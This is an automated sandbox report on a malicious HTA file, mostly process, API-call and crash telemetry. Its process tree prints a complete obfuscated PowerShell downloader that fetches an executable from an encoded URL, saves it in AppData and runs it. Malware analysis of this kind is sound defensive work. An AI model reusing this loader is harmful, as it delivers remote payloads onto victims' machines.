Summary | ZeroBOX

mshta.hta

Generic Malware Antivirus AntiDebug MSOffice File AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 9, 2023, 9:38 p.m. Sept. 9, 2023, 9:40 p.m.
Size 115.0KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 cc504d2b599df93f30cf9fe27cb00ce2
SHA256 a774163cffc40309ec4399c67a0c24a6c3194695c881429fb62c6019f8b7f66f
CRC32 F372EA1D
ssdeep 1536:1xt1AMfJfwOaEVay8UtHcUp3MQRBAGdJd5RoSYceoK7LC4btIwTv67DJw7wRemyW:1xt1TRz84AGdJdjcF7E
Yara None matched

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\mshta.hta.html

    2172
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2172 CREDAT:145409

      1184
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function vLgQqc($shynNH, $cjqcQTcfPnhvHt){[IO.File]::WriteAllBytes($shynNH, $cjqcQTcfPnhvHt)};function DYJPznobxDJ($shynNH){if($shynNH.EndsWith((BUuvaHHCZtbEIxGO @(53247,53301,53309,53309))) -eq $True){Start-Process (BUuvaHHCZtbEIxGO @(53315,53318,53311,53301,53309,53309,53252,53251,53247,53302,53321,53302)) $shynNH}else{Start-Process $shynNH}};function ILHelJwYUYjnaSBmnS($OyikogZshAcTARtZfQp){$YXsYVbCYUcGsoQpjHgYWb = New-Object (BUuvaHHCZtbEIxGO @(53279,53302,53317,53247,53288,53302,53299,53268,53309,53306,53302,53311,53317));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cjqcQTcfPnhvHt = $YXsYVbCYUcGsoQpjHgYWb.DownloadData($OyikogZshAcTARtZfQp);return $cjqcQTcfPnhvHt};function BUuvaHHCZtbEIxGO($FsbvwAXRtBnk){$xOvWaMJmIEQbInC=53201;$KilsHtOT=$Null;foreach($eQdZafGaaTHrB in $FsbvwAXRtBnk){$KilsHtOT+=[char]($eQdZafGaaTHrB-$xOvWaMJmIEQbInC)};return $KilsHtOT};function uNhUPkTAcAmIxMjHI(){$fqjvQFxmiHBepHBwB = $env:AppData + '\';$JxRAct = $fqjvQFxmiHBepHBwB + '2023.exe.exe'; if (Test-Path -Path $JxRAct){DYJPznobxDJ $JxRAct;}Else{ $CWSPaD = ILHelJwYUYjnaSBmnS (BUuvaHHCZtbEIxGO @(53305,53317,53317,53313,53259,53248,53248,53250,53257,53254,53247,53251,53253,53255,53247,53251,53251,53250,53247,53250,53251,53255,53248,53299,53306,53311,53316,53248,53251,53249,53251,53252,53247,53302,53321,53302,53247,53302,53321,53302));vLgQqc $JxRAct $CWSPaD;DYJPznobxDJ $JxRAct;};;;;}uNhUPkTAcAmIxMjHI;

        572

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
117.18.232.200 Active Moloch
164.124.101.2 Active Moloch
185.246.221.126 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001253d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7f64c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7f64c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7f64c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c1d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c1d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c2b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c2b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c2b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c2b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c630
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c630
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c630
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001250c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001250c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001250c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cc50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cc50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cc50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cd30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cd30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cda0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cda0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cd30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cd30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80cd30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b834bb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b834bb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b834bb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b834bb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b835710
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b835710
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c2b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80c2b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80ca90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80ca90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80ca90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b80ca90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8520a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8520a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda5a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 96200464
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 96206416
registers.r11: 96202224
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1921415032
registers.r13: 0
1 0 0
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2172
region_size: 3739648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000023b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2172
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bad000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bb4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdc44000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdad1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2172
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000026f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef69c9000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2172
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feecb89000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1184
region_size: 4460544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002840000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bad000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bb4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdc44000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdad1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077186000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772d6000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077181000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076ba0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772af000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772bb000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe117000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdbe4000
process_handle: 0xffffffffffffffff
1 0 0
Application Crash Process iexplore.exe with pid 2172 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
